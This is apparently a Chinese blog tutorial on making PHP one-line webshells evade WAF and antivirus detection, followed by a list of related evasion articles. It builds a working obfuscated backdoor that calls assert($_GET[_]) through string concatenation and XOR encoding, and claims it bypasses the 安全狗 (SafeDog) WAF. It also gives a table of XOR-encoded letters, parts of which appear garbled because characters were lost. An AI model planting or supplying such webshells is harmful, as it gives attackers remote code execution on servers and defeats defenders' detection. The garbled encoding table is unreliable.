PHP之一句话木马免杀
目录
免杀小技巧
1.字符串拼接方式,构造敏感函数。
2.通过PHP的动态函数方法执行一句话。
3.利用php异或^构造字符串
免杀木马构造
一句话测试
异或转码数据
小结
免杀小技巧
1.字符串拼接方式,构造敏感函数。
<?php
$a = 'ass';
$b = 'er';
$c = 't';
$d = $a.$b.$c; //assert
2.通过PHP的动态函数方法执行一句话。
<?php
$a = 'assert';
$b = '_GET';
$a($$b['mu']); //assert($_GET['mu'])
3.利用php异或^构造字符串
PHP有一特性
当两个字符串执行异或,会得到一个字符串。
可以通过两个非字母字符串构造a-z任意字母
<?php
$a = (''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`');
echo $a;//abcdef
免杀木马构造
综合上面提到的小技巧,实现一句话木马的构造,并绕过大部分WAF
<?php
$_=(''^'`').(''^'`').(''^'`');//ass
$__=(''^'`').(''^'`').(''^'`'); //ert
$_ = $_.$__;//assert
$__='_'.('\''^'`').('%'^'`').('4'^'`'); //_GET//$__='_'.('
//'^']').('/'^'`').(''^']').(' '^']'); //_POST$___=$$__;
@$_($___[_]); //@assert($_GET[_])
?>
一句话测试
异或转码数据
自己整理的部分可实现的字符串
乱码字符是ASCII码,直接复制到本地php文件中使用即可。
(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`')//abcdefg
(''^'`').(' '^'`').('
'^'`').(''^'`').(''^'`').('
'^'`').(''^'`')//hijklmn
(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`')//opqrst
(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`')//uvwxyz('!'^'`').('"'^'`').('#'^'`').('$'^'`').('%'^'`').('&'^'`').('\''^'`')//ABCDEFG
('('^'`').(')'^'`').('*'^'`').('+'^'`').(','^'`').('-'^'`').('.'^'`')//HIJKLMN
('/'^'`').('0'^'`').('1'^'`').('2'^'`').('3'^'`').('4'^'`')//OPQRST
('5'^'`').('6'^'`').('7'^'`').('8'^'`').('9'^'`').(':'^'`')//UVWXYZ(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']')//ABCDEFG
(''^']').(''^']').(''^']').(''^']').(''^']').(''^']').(''^']')//HIJKLMN
(''^']').('
'^']').(''^']').(''^']').(''^']').(' '^']')//OPQRST
(''^']').(''^']').('
'^']').(''^']').(''^']').(''^']')//UVWXYZ
小结
waf的免杀绕过就是打乱木马的特征。
这里只测试了安全狗能绕过,其他waf自行测试吧
PHP之一句话木马免杀相关推荐
- PHP一句话木马免杀(通过VirusTotal测试)
PHP一句话木马免杀 仅用于学习与交流,请勿用于非法用途!!! 简介与思路 免杀技术全称为反杀毒技术Anti Anti- Virus简称"免杀",它指的是一种能使病毒木马免于被杀毒 ...
- 各类一句话木马免杀集合
各类一句话木马免杀集合,基本过D盾与安全狗,php.asp.aspx.jsp一句话和冰蝎,我写的文章链接如下: https://www.cnblogs.com/joke-ljh/p/13794125. ...
- PHP一句话木马免杀学习
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POS ...
- 木马免杀原理及方法(超全)
灰鸽子免杀 概况 免杀意为免除被杀毒 软件杀掉的软件. 灰鸽子免杀简介:本工具为纯绿色工具,软件采用独特的查杀技巧可完全查杀灰鸽子全系列(VIP2005.vip2006.免杀处理) 木马,本软件已经过 ...
- 0x06 木马免杀篇、0x07应急与响应、0x08 安全防御篇、0x09 其他问题篇
来源如下图:(微信公众号:0x00实验室) 0x06 木马免杀篇 免杀可以先fuzz 定位出被查杀的语句,然后对被查杀那部分进行一波操作,像是加密啊.编 码啊.动态执行啊什么的,或者 ...
- MSF编码+VS编译木马免杀
MSF编码+VS编译木马免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e ...
- msfvenom——木马免杀篇
msfvenom--木马免杀篇 目录 msfvenom--木马免杀篇 c语言执行 生成shellcode.c c语言执行 检查 python语言执行 方法一:python加载C代码 方法2:py2ex ...
- 过新版狗php一句话,整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)...
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话) 发布时间:2020-06-20 00:54:04 来源:51CTO 阅读:3175 作者:gu ...
- 黑客攻击-木马免杀之PE文件
当你好不容易弄出来一个木马(具体可参考这里)的时候,却被杀毒软件轻易的就检测出来了,那一切岂不是白费了.Win10中的windows defender基于流量检测很容易把常见的木马程序检测出来,那怎么 ...
最新文章
- 总结是学习最好的方式(转)
- python中tornado的第一个例子
- 头条丨2017年人工智能年报
- kafka 在阿里云部署
- Oracle:关于分布式数据库(创建数据库链路,创建触发器)
- softmax简单模型处理Mnist分类问题
- Lombok介绍、附比较好用的几种注释推荐
- Maven + Nexus + SVN + Eclipse 配置步骤说明
- C#利用phantomJS抓取AjAX动态页面
- 正则去除汉字和只取数字
- CISCO 2811 路由器配置命令全集
- C5750X7R2E105K230KA(电容器)MSP430F5249IRGCR微控制器资料
- 425 Failed to establish connection解决方案
- 计算机考csp200分啥水平,信息学竞赛CSP诞生多位满分选手,小码王学员包揽多个组别省市第一...
- 蜗牛星际NAS,通过ssh修改mac和sn
- iPhone手机开发
- 【卷积神经网络】12、激活函数 | Tanh / Sigmoid / ReLU / Leaky ReLU / ELU / SiLU / Mish
- 网络技术-路由器配置
- Zuul、Gateway与Nginx的区别
- Model Inversion Attacks that Exploit Confidence Informati on and Basic Countermeasures 阅读心得